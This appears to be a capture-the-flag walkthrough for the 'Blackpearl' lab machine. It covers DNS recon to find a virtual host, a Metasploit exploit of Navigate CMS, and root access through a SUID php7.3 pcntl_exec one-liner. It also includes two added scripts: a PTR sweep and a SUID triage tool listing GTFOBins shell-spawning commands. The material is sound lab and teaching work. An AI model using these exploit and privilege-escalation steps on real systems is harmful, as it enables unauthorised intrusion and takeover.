Blackpearl

Port 53 is DNS. Apart from nginx it is the only other service worth digging into, since OpenSSH is unlikely to be the way in.

To recon DNS:

dnsrecon -r 127.0.0.0/24 -n 192.168.218.134 -d dick

-r is the IP range to reverse-lookup (here the loopback range: asking the box's own name server for PTR records on 127.0.0.x is what reveals its hostname, blackpearl.tcm)

-n is the name server to query (the target IP)

-d is the domain (dnsrecon requires one, so any placeholder will do)

Add the discovered hostname to /etc/hosts, mapped to the target IP (192.168.218.134),

and then visit http://blackpearl.tcm (nginx serves the application for that hostname, so the name and not just the IP has to be in the request).
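The reverse-lookup sweep that dnsrecon -r/-n performs, redone with dig, plus an idempotent /etc/hosts update. This is an added example and not part of the original notes; it assumes dig is installed and uses the name server and range from the notes (192.168.218.134, 127.0.0.0/24). Nothing runs on load unless you pass the two arguments.

```shell
#!/bin/sh
# Added example, not from the original notes: the reverse-lookup sweep that
# dnsrecon -r/-n performs, done with dig, plus an idempotent /etc/hosts update.
# Assumptions: dig is installed; the name server and range are the ones the
# notes use (192.168.218.134, 127.0.0.0/24); nothing here is run on load.

# ptr_lookup NS IP: print the PTR name for IP, asking NS directly.
# Kept as its own function so it can be swapped out (e.g. for an offline test).
ptr_lookup() {
    dig +short +time=1 +tries=1 -x "$2" "@$1" 2>/dev/null
}

# reverse_sweep NS PREFIX: PREFIX is the first three octets (e.g. 127.0.0);
# prints "IP NAME" for every address in PREFIX.0-255 that has a PTR record.
# Asking the target's own resolver about loopback is what leaks the vhost name.
reverse_sweep() {
    ns="$1"; prefix="$2"; i=0
    while [ "$i" -le 255 ]; do
        ip="$prefix.$i"
        name=$(ptr_lookup "$ns" "$ip" || true)
        # strip the trailing dot dig prints on fully-qualified names
        [ -n "$name" ] && printf '%s %s\n' "$ip" "${name%.}"
        i=$((i + 1))
    done
}

# add_hosts_entry IP NAME [FILE]: append "IP NAME" to FILE (default /etc/hosts)
# unless NAME is already listed, so repeated runs do not pile up duplicates.
add_hosts_entry() {
    ip="$1"; name="$2"; file="${3:-/etc/hosts}"
    if grep -qF -- "$name" "$file" 2>/dev/null; then
        return 0
    fi
    printf '%s\t%s\n' "$ip" "$name" >> "$file"
}

# Usage: sh dns_sweep.sh NS PREFIX   (e.g. sh dns_sweep.sh 192.168.218.134 127.0.0)
if [ "$#" -eq 2 ]; then
    reverse_sweep "$1" "$2"
fi
```

Run it as root (or against a copy of /etc/hosts) when you want add_hosts_entry to write the real file; the sweep itself needs no privileges.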

Setting the virtual host in Metasploit (the Navigate CMS RCE module needs it so the Host header matches what nginx expects):

use exploit/multi/http/navigate_cms_rce
set rhost 192.168.218.134
set vhost blackpearl.tcm

Once the Meterpreter session is open, run:

shell

to drop into a system shell.

To upgrade to a proper TTY shell we need an interpreter that can spawn one; Python is the usual choice. Check whether it is present (on newer systems it may only be installed as python3, so check for that name too):

which python

Finding files with the SUID bit set:

find / -type f -perm -4000 2>/dev/null

Compare the SUID binaries found against GTFOBins for known privilege-escalation primitives.

Abusing SUID via PHP (the case here). The -p argument tells the spawned shell to keep the elevated effective UID instead of dropping it; whoami should then report root and the flag is in /root:

cd /usr/bin

php7.3 -r "pcntl_exec('/bin/sh', ['-p']);"
whoami
cd /root
ls
cat flag.txt
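A small triage script tying the SUID enumeration and the GTFOBins comparison together: it reads the output of the find command above and prints the matching privesc one-liner for each binary it recognises, the PHP pcntl_exec line included. This is an added example, not part of the original notes; the lookup table is a hand-picked, partial subset of the GTFOBins SUID entries (an assumption, with gtfobins.github.io as the reference), the version stripping (php7.3 to php) is this script's own convention, and nothing runs on load unless you pass a file argument.

```shell
#!/bin/sh
# Added example, not from the original notes: triage the output of
#   find / -type f -perm -4000 2>/dev/null
# against a small, hand-picked subset of the GTFOBins "SUID" entries and print
# the matching privesc one-liner. The table below is an assumption (partial and
# abbreviated); gtfobins.github.io is the reference. Nothing runs on load.

# name|command template; %s is replaced with the full path of the binary.
# -p keeps the elevated effective UID (bash drops it otherwise), which is why
# every template that spawns a shell passes it.
gtfo_suid_table() {
    cat <<'EOF'
php|%s -r "pcntl_exec('/bin/sh', ['-p']);"
python|%s -c 'import os; os.execl("/bin/sh", "sh", "-p")'
perl|%s -e 'exec "/bin/sh";'
find|%s . -exec /bin/sh -p \; -quit
env|%s /bin/sh -p
bash|%s -p
EOF
}

# gtfo_cmd KEY: print the template for KEY, or nothing if unknown.
gtfo_cmd() {
    gtfo_suid_table | awk -F'|' -v k="$1" '$1 == k { print substr($0, length(k) + 2); exit }'
}

# norm_name PATH: basename with any trailing version stripped,
# so /usr/bin/php7.3 -> php and /usr/bin/python3.7 -> python.
norm_name() {
    printf '%s\n' "${1##*/}" | sed 's/[0-9.]*$//'
}

# suid_triage: read one path per line on stdin (the find output), print
# "PATH|COMMAND" for every binary with a known SUID abuse.
suid_triage() {
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        tmpl=$(gtfo_cmd "$(norm_name "$path")")
        [ -n "$tmpl" ] || continue
        # substitute the real path for %s; templates never contain '|',
        # and paths are assumed to be plain (no '|' or '&')
        printf '%s|%s\n' "$path" "$(printf '%s\n' "$tmpl" | sed "s|%s|$path|")"
    done
}

# Usage on the target:
#   find / -type f -perm -4000 2>/dev/null > suid.txt
#   sh suid_triage.sh suid.txt
if [ "$#" -eq 1 ]; then
    suid_triage < "$1"
fi
```

The printed command is exactly what you would type next; for the box in these notes the php7.3 line is the one that gives the root shell, and passwd, sudo and mount are correctly left alone because their SUID bit is expected.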